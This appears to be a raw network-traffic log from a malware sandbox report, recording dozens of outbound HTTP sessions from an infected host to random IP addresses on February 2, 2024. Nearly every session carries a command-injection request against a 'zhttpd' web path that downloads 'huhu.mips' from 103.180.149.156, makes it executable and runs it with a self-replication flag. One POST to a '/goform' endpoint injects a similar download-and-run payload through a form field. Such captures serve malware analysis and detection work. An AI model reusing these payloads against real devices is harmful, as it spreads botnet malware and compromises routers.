                                            Feb 2, 2024 06:21:06.506794930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2861192.168.2.1536296163.17.170.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506815910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2862192.168.2.1533306136.182.93.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506864071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2863192.168.2.1537796184.60.50.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506905079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2864192.168.2.1547968200.47.6.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506939888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2865192.168.2.1559822151.239.18.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506989002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2866192.168.2.155204414.94.180.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507023096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2867192.168.2.1546858197.142.75.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507054090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2868192.168.2.1540106192.190.65.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507102013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2869192.168.2.155911096.176.69.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507128954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2870192.168.2.15332341.201.0.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507194996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2871192.168.2.1542048166.191.15.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507205963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2872192.168.2.155425024.250.82.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507287025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2873192.168.2.154830074.234.72.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.507304907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2874192.168.2.154353639.108.162.1128080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.725730896 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:07.069144011 CET602INHTTP/1.1 400
                                            Content-Type: text/html;charset=utf-8
                                            Content-Language: en
                                            Content-Length: 435
                                            Date: Fri, 02 Feb 2024 05:21:06 GMT
                                            Connection: close
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2875192.168.2.1547496178.8.37.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519306898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2876192.168.2.155678265.102.20.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519342899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2877192.168.2.155449471.134.149.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519377947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2878192.168.2.1558214198.191.78.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519495010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2879192.168.2.1556478192.101.28.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519522905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2880192.168.2.1555972159.149.193.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519577026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2881192.168.2.154313050.210.129.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519598007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2882192.168.2.154419894.11.15.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519659996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2883192.168.2.153987812.211.178.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519689083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2884192.168.2.1537404106.254.35.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519722939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2885192.168.2.1554540219.26.97.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519792080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2886192.168.2.154744832.233.224.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519814014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2887192.168.2.1552038161.116.20.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519869089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2888192.168.2.153856468.23.14.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519897938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2889192.168.2.1546574141.3.204.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519927025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2890192.168.2.153316025.116.74.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.519958019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2891192.168.2.1556342165.54.166.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520041943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2892192.168.2.1558468216.221.220.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520081997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2893192.168.2.1549902125.10.186.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520108938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2894192.168.2.154639083.206.9.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520145893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2895192.168.2.1544450179.30.130.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520194054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2896192.168.2.1540182161.134.146.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520231009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2897192.168.2.1546952141.32.121.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520275116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2898192.168.2.154109297.11.191.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520320892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2899192.168.2.153278613.65.8.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520350933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2900192.168.2.155396820.59.130.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520394087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2901192.168.2.1552090182.241.202.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520435095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2902192.168.2.1533138152.47.21.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520481110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2903192.168.2.155186453.65.204.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520513058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2904192.168.2.154101651.241.64.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520558119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2905192.168.2.1538040140.252.146.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520597935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2906192.168.2.15335868.21.83.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520644903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2907192.168.2.153983065.6.9.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520687103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2908192.168.2.1559674151.73.83.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520706892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2909192.168.2.1550408142.177.126.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520746946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2910192.168.2.1538984203.229.42.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520797968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2911192.168.2.1535404219.122.59.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520836115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2912192.168.2.153571686.126.61.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520885944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2913192.168.2.153753018.32.231.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520915031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2914192.168.2.1535206193.13.65.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520946026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2915192.168.2.15331421.213.73.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.520987034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2916192.168.2.153455885.65.242.17443
                                            TimestampBytes transferredDirectionData
